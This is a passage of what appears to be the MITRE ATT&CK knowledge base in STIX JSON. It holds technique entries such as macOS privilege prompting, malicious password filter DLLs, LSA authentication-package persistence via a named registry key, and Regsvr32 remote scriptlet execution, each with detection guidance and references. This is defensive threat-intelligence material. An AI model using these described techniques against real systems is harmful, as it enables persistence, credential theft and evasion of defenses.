"User Mode Signature Validation", "Windows User Account Control", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "created": "2020-02-05T14:54:07.588Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1553", "external_id": "T1553"}, {"source_name": "SpectorOps Code Signing Dec 2017", "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"}, {"source_name": "SpectorOps Subverting Trust Sept 2017", "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"}, {"source_name": "Securelist Digital Certificates", "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/"}, {"source_name": "Symantec Digital Certificates", "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.", "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Elevated Execution with Prompt", "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jimmy Astle, @AstleJimmy, Carbon Black", "Erika Noerenberg, @gutterchurl, Carbon Black"], "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["root"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0", "created": "2020-01-30T14:40:20.187Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1548/004", "external_id": "T1548.004"}, {"source_name": "AppleDocs AuthorizationExecuteWithPrivileges", "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.", "url": "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg"}, {"source_name": "Carbon Black Shlayer Feb 2019", "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.", "url": "https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html"}, {"source_name": "Death by 1000 installers; it's all broken!", "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.", "url": "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8"}, {"source_name": "OSX Coldroot RAT", "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.", "url": "https://objective-see.com/blog/blog_0x2A.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Firmware", "description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", "created": "2020-10-02T16:46:42.537Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1592/003", "external_id": "T1592.003"}, {"source_name": "ArsTechnica Intel", "description": "Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel source code and proprietary data dumped online. Retrieved October 20, 2020.", "url": "https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-16T12:29:47.903Z", "name": "Encrypted Channel", "description": "Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "created": "2020-03-16T15:33:01.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1573", "external_id": "T1573"}, {"source_name": "SANS Decrypting SSL", "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840"}, {"source_name": "SEI SSL Inspection Risks", "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Password Filter DLL", "description": "Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.\n\nBefore registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.\n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Vincent Le Toux"], "x_mitre_detection": "Monitor for change notifications to and from unfamiliar password filters.\n\nNewly installed password filters will not take effect until after a system reboot.\n\nPassword filters will show up as an autorun and loaded DLL in lsass.exe. (Citation: Clymb3r Function Hook Passwords Sept 2013)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b8c5c9dd-a662-479d-9428-ae745872537c", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1174", "external_id": "T1174"}, {"source_name": "Carnal Ownage Password Filters Sept 2013", "description": "Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.", "url": "http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html"}, {"source_name": "Clymb3r Function Hook Passwords Sept 2013", "description": "Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.", "url": "https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Authentication Package", "description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", "created": "2020-01-24T14:54:42.757Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/002", "external_id": "T1547.002"}, {"source_name": "Graeber 2014", "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html"}, {"source_name": "Microsoft Configure LSA", "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx"}, {"source_name": "MSDN Authentication Packages", "description": "Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:09.988Z", "name": "System Firmware", "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. \n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. (Citation: Basnight, Zachry, et al.)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Operational Databases: Device Alarm", "Application Log: Application Log Content", "Firmware: Firmware Modification", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0857", "external_id": "T0857"}, {"source_name": "Basnight, Zachry, et al.", "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ", "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Regsvr32", "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Casey Smith"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation", "Anti-virus", "Application control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", "created": "2020-01-23T19:52:17.414Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/010", "external_id": "T1218.010"}, {"source_name": "FireEye Regsvr32 Targeting Mongolian Gov", "description": "Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html"}, {"source_name": "LOLBAS Regsvr32", "description": "LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"}, {"source_name": "Microsoft Regsvr32", "description": "Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.", "url": "https://support.microsoft.com/en-us/kb/249873"}, {"source_name": "Carbon Black Squiblydoo Apr 2016", "description": "Nolen, R. et al.. (2016, April 28). Threat Advisory: \u201cSquiblydoo\u201d Continues Trend of Attackers Using Native OS Tools to \u201cLive off the Land\u201d. Retrieved April 9, 2018.", "url": "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Data Compressed", "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.\n\nIf the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "created": "2017-05-31T21:30:19.338Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1002", "external_id": "T1002"}, {"source_name": "Wikipedia File Header Signatures", "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", "url": "https://en.wikipedia.org/wiki/List_of_file_signatures"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-05-04T18:00:33.023Z", "name": "Exfiltration to Text Storage Sites", "description": "Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information. \n\nText storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)\n\n**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Harun K\u00fc\u00dfner"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "created": "2023-02-27T22:51:27.101Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1567/003", "external_id": "T1567.003"}, {"source_name": "Pastebin EchoSec", "description": "Ciarniello, A. (2019, September 24). What is Pastebin and Why Do Hackers Love It?. Retrieved April 11, 2023.", "url": "https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:10.181Z", "name": "Masquerading", "description": "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. \n\nApplications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Service: Service Creation", "File: File Modification", "Command: Command Execution", "Scheduled Job: Scheduled Job Modification", "File: File Metadata"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0849", "external_id": "T0849"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Credentials in Files", "description": "Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\n\nIn cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)\n\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Microsoft Threat Intelligence Center (MSTIC)"], "x_mitre_detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS"], "x_mitre_version": "1.2", "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "x_mitre_system_requirements": ["Access to files"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "created": "2017-05-31T21:31:02.188Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1081", "external_id": "T1081"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/639.html", "external_id": "CAPEC-639"}, {"source_name": "CG 2014", "description": "CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.", "url": "http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html"}, {"source_name": "SRD GPP", "description": "Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.", "url": "http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx"}, {"source_name": "Specter Ops - Cloud Credential Storage", "description": "Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.", "url": "https://posts.specterops.io/head-in-the-clouds-bd038bb69e48"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Software", "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as 